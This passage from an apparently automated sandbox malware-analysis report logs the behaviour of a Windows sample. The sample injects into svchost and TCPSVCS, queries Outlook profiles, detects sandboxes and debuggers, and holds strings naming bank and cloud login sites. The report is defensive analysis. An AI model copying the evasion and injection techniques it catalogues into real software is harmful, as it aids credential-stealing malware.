                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ofZiNLLKZU.exeStatic file information: File size 1265664 > 1048576
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ofZiNLLKZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kwRriiLHUBrBci.exe, 00000004.00000000.1649615978.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3901520973.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: ofZiNLLKZU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ofZiNLLKZU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ofZiNLLKZU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ofZiNLLKZU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ofZiNLLKZU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005D42DE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F0A76 push ecx; ret 0_2_005F0A89
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_01A67B28 push ss; retf 0_2_01A67CC2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_01A67CC3 push ss; retn 006Fh0_2_01A67D0A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004122D5 pushad ; ret 2_2_004122FD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D286 pushad ; ret 2_2_0040D29D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032B0 push eax; ret 2_2_004032B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408306 push ds; retf 2_2_00408307
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404D95 push edx; retf 2_2_00404D96
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418FFD push esi; iretd 2_2_00418FFE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177A9 push ds; retf 80F3h2_2_004177B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0225F pushad ; ret 2_2_03A027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A027FA pushad ; ret 2_2_03A027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0283D push eax; iretd 2_2_03A02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A01366 push eax; iretd 2_2_03A01369
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02D9225F pushad ; ret 5_2_02D927F9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02D927FA pushad ; ret 5_2_02D927F9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02D9283D push eax; iretd 5_2_02D92858
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DC09AD push ecx; mov dword ptr [esp], ecx5_2_02DC09B6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001423FB pushfd ; iretd 5_2_001423FC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001444F6 push ds; retf 80F3h5_2_00144500
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001505E4 push ss; retf 5_2_001505E8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013F022 pushad ; ret 5_2_0013F04A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00135053 push ds; retf 5_2_00135054
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0014B736 push edx; retf 5_2_0014B737
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0014D868 push ebp; ret 5_2_0014D86D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00131AE2 push edx; retf 5_2_00131AE3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00145D4A push esi; iretd 5_2_00145D4B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3B4CC push ebp; ret 5_2_02A3B4D4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A395C2 push ecx; iretd 5_2_02A395C7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A32E0D push es; iretd 5_2_02A32E14
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005EF98E
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00661C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00661C41
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96059
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeAPI/Special instruction interceptor: Address: 1A6B20C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEWindow / User API: threadDelayed 9845Jump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeAPI coverage: 3.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep count: 125 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep time: -250000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep count: 9845 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep time: -19690000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe TID: 8108Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe TID: 8108Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0063DBBE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0060C2A2 FindFirstFileExW,0_2_0060C2A2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006468EE FindFirstFileW,FindClose,0_2_006468EE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0064698F
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0063D076
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0063D3A9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00649642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00649642
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064979D
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00649B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00649B2B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00645C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00645C97
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0014C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0014C4E0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005D42DE
                Source: 164U99.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 164U99.5.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 164U99.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 164U99.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 164U99.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3902134946.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                Source: 164U99.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 164U99.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 164U99.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
                Source: 164U99.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 0000000A.00000002.2063042888.000001B9460DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 164U99.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 164U99.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 164U99.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 164U99.5.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 164U99.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 164U99.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 164U99.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 164U99.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417713 LdrLoadDll,2_2_00417713
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064EAA2 BlockInput,0_2_0064EAA2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00602622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00602622
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005D42DE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F4CE8 mov eax, dword ptr fs:[00000030h]0_2_005F4CE8
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_01A6B4D8 mov eax, dword ptr fs:[00000030h]0_2_01A6B4D8
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_01A6B478 mov eax, dword ptr fs:[00000030h]0_2_01A6B478
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_01A69E08 mov eax, dword ptr fs:[00000030h]0_2_01A69E08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]2_2_03B08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
